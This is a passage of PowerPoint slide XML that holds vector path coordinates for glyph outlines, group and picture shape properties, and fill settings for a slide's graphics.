                </a:moveTo>
                <a:lnTo>
                  <a:pt x="199898" y="27623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197278" y="28184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189609" y="31551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185165" y="34415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180135" y="38456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214443" y="38456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214443" y="28184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214666" y="28184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210970" y="27623"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="241037" y="37982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228383" y="37982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228383" y="87102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230368" y="93723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238376" y="101985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244218" y="104050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254098" y="104050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256601" y="103847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262218" y="103040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264812" y="102524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266841" y="101985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267180" y="101985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267180" y="92938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251639" y="92938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249717" y="92636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249234" y="92636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245666" y="90917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241128" y="79300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241037" y="37982"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="267180" y="90514"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="266504" y="90514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265511" y="90917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="263910" y="91422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259421" y="92636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257256" y="92938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267180" y="92938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267180" y="90514"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="267180" y="27343"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="219812" y="27343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219812" y="37982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267180" y="37982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267180" y="27343"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="241037" y="5725"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228383" y="5725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228383" y="27343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241037" y="27343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241037" y="5725"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="311030" y="27343"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="294947" y="27343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294947" y="46535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311030" y="46535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311030" y="27343"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="311030" y="83375"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="294947" y="83375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294947" y="102569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311030" y="102569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311030" y="83375"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="440030" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="420451" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412557" y="2514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400173" y="12571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397060" y="18858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397060" y="31517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398288" y="35592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398346" y="35784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403511" y="42607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407504" y="45750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412895" y="48623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412895" y="49029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394376" y="83645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397602" y="90827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430015" y="104858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437193" y="104332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443852" y="102753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449851" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455504" y="96237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457169" y="94823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423722" y="94823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418421" y="92848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410075" y="84946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407978" y="79940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407978" y="69119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409196" y="64855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413988" y="57470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414090" y="57312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417339" y="54326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421376" y="52125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452211" y="52125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446233" y="49566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446233" y="49162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451715" y="46693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452639" y="45931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437887" y="45931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434933" y="45076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410594" y="20272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412421" y="16634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419534" y="11326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419367" y="11326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424286" y="9901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457347" y="9901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448156" y="2514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448390" y="2514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440030" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="452211" y="52125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="421376" y="52125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425549" y="53652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428910" y="54842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="433940" y="56549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436241" y="57470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451760" y="81780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449797" y="86405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="441948" y="93141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436692" y="94823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457169" y="94823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462271" y="90491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465654" y="83284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465654" y="68514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463985" y="63486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457331" y="55582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452527" y="52261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452211" y="52125"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="457347" y="9901"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="435677" y="9901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440414" y="11326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447835" y="17027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449684" y="20856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449632" y="30058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448827" y="33515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445421" y="39892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="442331" y="42968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437887" y="45931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452639" y="45931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455865" y="43270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461527" y="34514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462948" y="30058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462948" y="18116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459970" y="12009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457347" y="9901"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="520421" y="270"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487830" y="29287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485735" y="52396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486255" y="65000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504917" y="101500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520421" y="104657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528723" y="103868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535864" y="101500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541842" y="97553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545334" y="93544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515910" y="93544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512491" y="92667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511445" y="92029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506888" y="88942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504790" y="86270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503387" y="82971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501804" y="79334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501677" y="79043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500698" y="75058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500639" y="74821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499647" y="65393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499399" y="59535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499426" y="45570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516181" y="11383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545233" y="11383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542020" y="7562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536033" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528833" y="1080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520421" y="270"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="545233" y="11383"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="524685" y="11383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528181" y="12257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533594" y="15759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535780" y="18409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537316" y="21821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538940" y="25323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539947" y="29287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540025" y="29609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541151" y="39644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541421" y="45570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541411" y="59535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535978" y="86270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535873" y="86518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533707" y="89165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528136" y="92667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524639" y="93544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545334" y="93544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546655" y="92029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550355" y="84817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552998" y="75807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554527" y="65393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554584" y="65000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555107" y="52531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554600" y="40296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554522" y="39644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553047" y="29609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552969" y="29287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550431" y="20543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546790" y="13234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545233" y="11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9" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1180548B-8D8C-6E80-8B58-CC8BDBD78381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="985338" y="1614064"/>
            <a:ext cx="7311991" cy="2997357"/>
            <a:chOff x="863583" y="1613186"/>
            <a:chExt cx="7311991" cy="2997357"/>
          </a:xfrm>
        </p:grpSpPr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7A2018A2-9DA5-32F7-7202-C557F0B9B0CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2834206" y="3143440"/>
              <a:ext cx="1096645" cy="534670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1096645" h="534670">
                  <a:moveTo>
                    <a:pt x="715519" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="115003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381892" y="534427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096565" y="414350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096565" y="143754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715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A59B68AF-C743-B32E-6077-A93EED2AADF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3216945" y="3285503"/>
              <a:ext cx="715645" cy="392430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="715645" h="392429">
                  <a:moveTo>
                    <a:pt x="712979" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="115003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="392364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112620" y="372069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357336" y="329788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602052" y="288353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684189" y="274824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706205" y="272287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715519" y="272287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712979" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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4" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1FB5FD8-61FD-603F-880E-D6A389B7A78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4206" y="3145977"/>
              <a:ext cx="1087251" cy="531890"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E7B33F-BC6E-9E47-3A69-C8044FE16EA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4468" y="2550891"/>
              <a:ext cx="1569057" cy="1298525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="object 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07BBA2C4-FBCF-05C3-69BC-E3746BD8440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1986" y="2701185"/>
              <a:ext cx="496206" cy="549648"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280864CA-7058-A9AD-99FD-34C281A7D27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75894" y="3321019"/>
              <a:ext cx="223546" cy="168276"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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08B2E457-D32E-AC82-497C-57A15EA8E050}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3294449" y="3867329"/>
              <a:ext cx="626745" cy="106680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="54586" y="2683"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41819" y="2683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35120" y="3833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172" y="39101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="63454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18157" y="98293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41842" y="106614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52985" y="106614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78496" y="99601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80729" y="98587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83210" y="97504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83210" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43782" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39338" y="94302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13894" y="61808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13894" y="48008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14751" y="42077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43240" y="14070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83210" y="14070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83210" y="11522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76646" y="8230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70691" y="5953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59954" y="3337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54586" y="2683"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="83210" y="81900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82263" y="81900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77368" y="86297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73624" y="88642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71882" y="89679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60879" y="93986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54879" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83210" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83210" y="81900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="83210" y="14070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54518" y="14070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60315" y="15130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71188" y="19347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76669" y="22707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82195" y="27330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83210" y="27330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83210" y="14070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="116752" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104097" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104097" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116752" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116752" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="156564" y="3833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142285" y="3833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142285" y="16957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156564" y="16957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156564" y="3833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="155752" y="29562"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="143097" y="29562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143097" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155752" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155752" y="29562"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="626745" h="106679">
                  <a:moveTo>
                    <a:pt x="223376" y="27465"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="213225" y="27465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205401" y="28145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177269" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176639" y="67603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177298" y="76406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207644" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207894" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216383" y="106547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221278" y="106547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225947" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234857" y="103502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239210" y="102014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243474" y="100210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243474" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212391" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208849" y="94956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202443" y="92791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199669" y="91190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197323" y="89025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194910" y="86838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193075" y="84141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190218" y="77142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189519" y="73105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189519" y="68483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244962" y="68483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244962" y="61628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244777" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189512" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189964" y="53908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190060" y="52856"/>
